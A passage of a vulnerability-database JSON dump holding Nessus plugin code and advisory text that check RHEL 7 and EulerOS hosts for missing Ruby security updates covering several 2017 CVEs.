cpu:\"x86_64\", reference:\"ruby-doc-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-irb-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-libs-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-tcltk-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-bigdecimal-1.2.0-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-io-console-0.4.2-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-json-1.7.7-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-minitest-4.3.2-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-psych-2.0.0-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-rake-0.9.6-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-rdoc-4.0.0-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygems-2.0.14.1-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygems-devel-2.0.14.1-33.el7_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-devel / ruby-doc / ruby-irb / ruby-libs / ruby-tcltk / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:37:49", "description": "An update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker\ncould exploit this flaw to execute arbitrary commands by setting up a\nmalicious FTP server and tricking a user or Ruby application into\ndownloading files with specially crafted names using the Net::FTP\nmodule. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An\nattacker, with ability to control its format string parameter, could\nsend a specially crafted string that would disclose heap memory or\ncrash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during\ninstallation of a given gem. A specially crafted gem could use this\nflaw to install files outside of the regular directory.\n(CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS\nresponses when requesting the hostname of the rubygems server for a\ndomain, via a _rubygems._tcp DNS SRV query. An attacker with the\nability to manipulate DNS responses could direct the gem command\ntowards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable\nto an unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If\nlogs were printed in a terminal, an attacker could interact with the\nterminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially\ncrafted string to the application in order to crash the ruby\ninterpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize\ngems' specification text. A specially crafted gem could interact with\nthe terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU\nwhile parsing a sufficiently long gem summary. A specially crafted gem\nfrom a gem repository could freeze gem commands attempting to parse\nits summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of\nruby. An attacker with the ability to pass a specially crafted JSON\ninput to the extension could use this flaw to expose the interpreter's\nheap memory. (CVE-2017-14064)\n\n* The 'lazy_initialize' function in lib/resolv.rb did not properly\nprocess certain filenames. A remote attacker could possibly exploit\nthis flaw to inject and execute arbitrary commands. (CVE-2017-17790)", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-01T00:00:00", "title": "RHEL 7 : ruby (RHSA-2018:0378)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rubygems", "p-cpe:/a:redhat:enterprise_linux:ruby", "p-cpe:/a:redhat:enterprise_linux:rubygem-rdoc", "p-cpe:/a:redhat:enterprise_linux:rubygem-rake", "p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo", "p-cpe:/a:redhat:enterprise_linux:ruby-irb", "p-cpe:/a:redhat:enterprise_linux:rubygem-bigdecimal", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:ruby-doc", "cpe:/o:redhat:enterprise_linux:7.7", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:rubygem-psych", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:rubygems-devel", "p-cpe:/a:redhat:enterprise_linux:ruby-libs", "p-cpe:/a:redhat:enterprise_linux:rubygem-json", "p-cpe:/a:redhat:enterprise_linux:ruby-devel", "p-cpe:/a:redhat:enterprise_linux:rubygem-io-console", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:ruby-tcltk", "p-cpe:/a:redhat:enterprise_linux:rubygem-minitest"], "id": "REDHAT-RHSA-2018-0378.NASL", "href": "https://www.tenable.com/plugins/nessus/107082", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0378. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107082);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_xref(name:\"RHSA\", value:\"2018:0378\");\n\n script_name(english:\"RHEL 7 : ruby (RHSA-2018:0378)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker\ncould exploit this flaw to execute arbitrary commands by setting up a\nmalicious FTP server and tricking a user or Ruby application into\ndownloading files with specially crafted names using the Net::FTP\nmodule. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An\nattacker, with ability to control its format string parameter, could\nsend a specially crafted string that would disclose heap memory or\ncrash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during\ninstallation of a given gem. A specially crafted gem could use this\nflaw to install files outside of the regular directory.\n(CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS\nresponses when requesting the hostname of the rubygems server for a\ndomain, via a _rubygems._tcp DNS SRV query. An attacker with the\nability to manipulate DNS responses could direct the gem command\ntowards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable\nto an unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If\nlogs were printed in a terminal, an attacker could interact with the\nterminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially\ncrafted string to the application in order to crash the ruby\ninterpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize\ngems' specification text. A specially crafted gem could interact with\nthe terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU\nwhile parsing a sufficiently long gem summary. A specially crafted gem\nfrom a gem repository could freeze gem commands attempting to parse\nits summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of\nruby. An attacker with the ability to pass a specially crafted JSON\ninput to the extension could use this flaw to expose the interpreter's\nheap memory. (CVE-2017-14064)\n\n* The 'lazy_initialize' function in lib/resolv.rb did not properly\nprocess certain filenames. A remote attacker could possibly exploit\nthis flaw to inject and execute arbitrary commands. (CVE-2017-17790)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0898\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0899\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0901\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-10784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-14033\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-14064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17790\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-minitest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygems-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0378\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-debuginfo-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-devel-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-devel-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-doc-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-irb-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-libs-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-tcltk-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-tcltk-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-bigdecimal-1.2.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-bigdecimal-1.2.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-io-console-0.4.2-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-io-console-0.4.2-33.el7_4\")) flag++;\n\n if (rpm_exists(rpm:\"rubygem-json-1.7\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-json-1.7.7-33.el7_4\")) flag++;\n\n if (rpm_exists(rpm:\"rubygem-json-1.7\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-json-1.7.7-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-minitest-4.3.2-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-psych-2.0.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-psych-2.0.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-rake-0.9.6-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-rdoc-4.0.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygems-2.0.14.1-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygems-devel-2.0.14.1-33.el7_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-debuginfo / ruby-devel / ruby-doc / ruby-irb / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:53:13", "description": "According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Net::FTP module did not\n properly process filenames in combination with certain\n operations. A remote attacker could exploit this flaw\n to execute arbitrary commands by setting up a malicious\n FTP server and tricking a user or Ruby application into\n downloading files with specially crafted names using\n the Net::FTP module. (CVE-2017-17405)\n\n - A buffer underflow was found in ruby's sprintf\n function. An attacker, with ability to control its\n format string parameter, could send a specially crafted\n string that would disclose heap memory or crash the\n interpreter. (CVE-2017-0898)\n\n - It was found that rubygems did not sanitize gem names\n during installation of a given gem. A specially crafted\n gem could use this flaw to install files outside of the\n regular directory. (CVE-2017-0901)\n\n - A vulnerability was found where rubygems did not\n sanitize DNS responses when requesting the hostname of\n the rubygems server for a domain, via a _rubygems._tcp\n DNS SRV query. An attacker with the ability to\n manipulate DNS responses could direct the gem command\n towards a different domain. (CVE-2017-0902)\n\n - A vulnerability was found where the rubygems module was\n vulnerable to an unsafe YAML deserialization when\n inspecting a gem. Applications inspecting gem files\n without installing them can be tricked to execute\n arbitrary code in the context of the ruby interpreter.\n (CVE-2017-0903)\n\n - It was found that WEBrick did not sanitize all its log\n messages. If logs were printed in a terminal, an\n attacker could interact with the terminal via the use\n of escape sequences. (CVE-2017-10784)\n\n - It was found that the decode method of the\n OpenSSL::ASN1 module was vulnerable to buffer underrun.\n An attacker could pass a specially crafted string to\n the application in order to crash the ruby interpreter,\n causing a denial of service. (CVE-2017-14033)\n\n - A vulnerability was found where rubygems did not\n properly sanitize gems' specification text. A specially\n crafted gem could interact with the terminal via the\n use of escape sequences. (CVE-2017-0899)\n\n - It was found that rubygems could use an excessive\n amount of CPU while parsing a sufficiently long gem\n summary. A specially crafted gem from a gem repository\n could freeze gem commands attempting to parse its\n summary. (CVE-2017-0900)\n\n - A buffer overflow vulnerability was found in the JSON\n extension of ruby. An attacker with the ability to pass\n a specially crafted JSON input to the extension could\n use this flaw to expose the interpreter's heap memory.\n (CVE-2017-14064)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-03-20T00:00:00", "title": "EulerOS 2.0 SP2 : ruby (EulerOS-SA-2018-1067)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2018-03-20T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1067.NASL", "href": "https://www.tenable.com/plugins/nessus/108471", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108471);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-0898\",\n \"CVE-2017-0899\",\n \"CVE-2017-0900\",\n \"CVE-2017-0901\",\n \"CVE-2017-0902\",\n \"CVE-2017-0903\",\n \"CVE-2017-10784\",\n \"CVE-2017-14033\",\n \"CVE-2017-14064\",\n \"CVE-2017-17405\",\n \"CVE-2017-17790\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : ruby (EulerOS-SA-2018-1067)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Net::FTP module did not\n properly process filenames in combination with certain\n operations. A remote attacker could exploit this flaw\n to execute arbitrary commands by setting up a malicious\n FTP server and tricking a user or Ruby application into\n downloading files with specially crafted names using\n the Net::FTP module. (CVE-2017-17405)\n\n - A buffer underflow was found in ruby's sprintf\n function. An attacker, with ability to control its\n format string parameter, could send a specially crafted\n string that would disclose heap memory or crash the\n interpreter. (CVE-2017-0898)\n\n - It was found that rubygems did not sanitize gem names\n during installation of a given gem. A specially crafted\n gem could use this flaw to install files outside of the\n regular directory. (CVE-2017-0901)\n\n - A vulnerability was found where rubygems did not\n sanitize DNS responses when requesting the hostname of\n the rubygems server for a domain, via a _rubygems._tcp\n DNS SRV query. An attacker with the ability to\n manipulate DNS responses could direct the gem command\n towards a different domain. (CVE-2017-0902)\n\n - A vulnerability was found where the rubygems module was\n vulnerable to an unsafe YAML deserialization when\n inspecting a gem. Applications inspecting gem files\n without installing them can be tricked to execute\n arbitrary code in the context of the ruby interpreter.\n (CVE-2017-0903)\n\n - It was found that WEBrick did not sanitize all its log\n messages. If logs were printed in a terminal, an\n attacker could interact with the terminal via the use\n of escape sequences. (CVE-2017-10784)\n\n - It was found that the decode method of the\n OpenSSL::ASN1 module was vulnerable to buffer underrun.\n An attacker could pass a specially crafted string to\n the application in order to crash the ruby interpreter,\n causing a denial of service. (CVE-2017-14033)\n\n - A vulnerability was found where rubygems did not\n properly sanitize gems' specification text. A specially\n crafted gem could interact with the terminal via the\n use of escape sequences. (CVE-2017-0899)\n\n - It was found that rubygems could use an excessive\n amount of CPU while parsing a sufficiently long gem\n summary. A specially crafted gem from a gem repository\n could freeze gem commands attempting to parse its\n summary. (CVE-2017-0900)\n\n - A buffer overflow vulnerability was found in the JSON\n extension of ruby. An attacker with the ability to pass\n a specially crafted JSON input to the extension could\n use this flaw to expose the interpreter's heap memory.\n (CVE-2017-14064)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1067\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d95c5c2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.648-33.h2\",\n 